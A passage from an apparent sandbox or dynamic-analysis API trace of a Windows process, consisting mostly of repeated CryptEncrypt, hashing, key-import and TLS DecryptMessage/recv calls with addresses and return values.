pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.289] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.290] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.291] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.292] malloc (_Size=0x1fd) returned 0x3df00e0 [0137.292] free (_Block=0x0) [0137.292] free (_Block=0x3d81e60) [0137.292] malloc (_Size=0x1fd) returned 0x3d81e60 [0137.292] free (_Block=0x0) [0137.292] CryptDuplicateHash (in: hHash=0x432a38, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0137.292] CryptHashData (hHash=0x432e78, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0137.293] malloc (_Size=0x14) returned 0x3f65500 [0137.293] free (_Block=0x0) [0137.293] CryptGetHashParam (in: hHash=0x432e78, dwParam=0x2, pbData=0x3f65500, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65500, pdwDataLen=0x37dfacc) returned 1 [0137.293] CryptHashData (hHash=0x432a38, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0137.293] free (_Block=0x3f65500) [0137.293] CryptDestroyHash (hHash=0x432e78) returned 1 [0137.293] free (_Block=0x3d81e60) [0137.293] free (_Block=0x3594d18) [0137.293] malloc (_Size=0x1fd) returned 0x3594d18 [0137.293] free (_Block=0x0) [0137.293] malloc (_Size=0x94) returned 0x3d81660 [0137.293] free (_Block=0x0) [0137.293] malloc (_Size=0x94) returned 0x605a18 [0137.294] free (_Block=0x0) [0137.294] free (_Block=0x0) [0137.294] free (_Block=0x3d81660) [0137.294] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x432e78) returned 1 [0137.301] CryptExportKey (in: hKey=0x432e78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0137.301] CryptExportKey (in: hKey=0x432e78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0137.301] malloc (_Size=0x80) returned 0x60a248 [0137.301] free (_Block=0x0) [0137.302] CryptDestroyKey (hKey=0x432e78) returned 1 [0137.302] malloc (_Size=0x64) returned 0x60b3f0 [0137.302] free (_Block=0x0) [0137.302] malloc (_Size=0x80) returned 0x6099c8 [0137.302] free (_Block=0x0) [0137.302] malloc (_Size=0xc0) returned 0x60eec8 [0137.302] free (_Block=0x6099c8) [0137.302] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.304] CryptHashData (hHash=0x432bf8, pbData=0x60eec8, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.304] malloc (_Size=0x14) returned 0x3f65480 [0137.304] free (_Block=0x0) [0137.304] CryptGetHashParam (in: hHash=0x432bf8, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x37dfa34) returned 1 [0137.304] CryptDestroyHash (hHash=0x432bf8) returned 1 [0137.304] free (_Block=0x3f65480) [0137.304] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.304] CryptHashData (hHash=0x4329f8, pbData=0x60eec8, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.304] malloc (_Size=0x14) returned 0x3f65440 [0137.305] free (_Block=0x0) [0137.305] CryptGetHashParam (in: hHash=0x4329f8, dwParam=0x2, pbData=0x3f65440, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65440, pdwDataLen=0x37dfa34) returned 1 [0137.305] CryptDestroyHash (hHash=0x4329f8) returned 1 [0137.305] free (_Block=0x3f65440) [0137.305] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.305] CryptHashData (hHash=0x4327f8, pbData=0x60eec8, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.305] malloc (_Size=0x14) returned 0x3f65380 [0137.305] free (_Block=0x0) [0137.305] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65380, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65380, pdwDataLen=0x37dfa34) returned 1 [0137.305] CryptDestroyHash (hHash=0x4327f8) returned 1 [0137.305] free (_Block=0x3f65380) [0137.305] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.305] CryptHashData (hHash=0x432bf8, pbData=0x60eec8, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.305] malloc (_Size=0x14) returned 0x3f65320 [0137.305] free (_Block=0x0) [0137.305] CryptGetHashParam (in: hHash=0x432bf8, dwParam=0x2, pbData=0x3f65320, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65320, pdwDataLen=0x37dfa34) returned 1 [0137.305] CryptDestroyHash (hHash=0x432bf8) returned 1 [0137.305] free (_Block=0x3f65320) [0137.305] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.306] CryptHashData (hHash=0x432bf8, pbData=0x60eec8, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.306] malloc (_Size=0x14) returned 0x3f65300 [0137.306] free (_Block=0x0) [0137.306] CryptGetHashParam (in: hHash=0x432bf8, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x37dfa34) returned 1 [0137.306] CryptDestroyHash (hHash=0x432bf8) returned 1 [0137.306] free (_Block=0x3f65300) [0137.306] free (_Block=0x60eec8) [0137.307] malloc (_Size=0x50) returned 0x3d9a9e0 [0137.307] free (_Block=0x0) [0137.307] free (_Block=0x60b3f0) [0137.307] free (_Block=0x60a248) [0137.308] malloc (_Size=0xb8) returned 0x60eec8 [0137.308] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x60ef78 | out: phHash=0x60ef78) returned 1 [0137.308] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x60ef7c | out: phHash=0x60ef7c) returned 1 [0137.308] CryptHashData (hHash=0x432938, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0137.308] CryptHashData (hHash=0x432df8, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0137.308] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432cf8) returned 1 [0137.308] CryptSetKeyParam (hKey=0x432cf8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0137.308] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432c78) returned 1 [0137.308] CryptSetKeyParam (hKey=0x432c78, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0137.308] free (_Block=0x3d9a9e0) [0137.308] SetEvent (hEvent=0x3a4) returned 1 [0137.308] free (_Block=0x605a18) [0137.309] free (_Block=0x3594d18) [0137.309] free (_Block=0x3df00e0) [0137.309] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0137.309] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0137.725] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0137.725] malloc (_Size=0x1fd) returned 0x3594d18 [0137.725] free (_Block=0x0) [0137.725] malloc (_Size=0x1fd) returned 0x3d81e60 [0137.725] free (_Block=0x0) [0137.725] free (_Block=0x0) [0137.725] free (_Block=0x3594d18) [0137.725] malloc (_Size=0x1fd) returned 0x3594d18 [0137.725] free (_Block=0x0) [0137.725] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.726] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.727] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] malloc (_Size=0x1fd) returned 0x3df00e0 [0137.728] free (_Block=0x0) [0137.728] free (_Block=0x3d81e60) [0137.728] free (_Block=0x3594d18) [0137.728] malloc (_Size=0x1fd) returned 0x3594d18 [0137.728] free (_Block=0x0) [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.728] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: 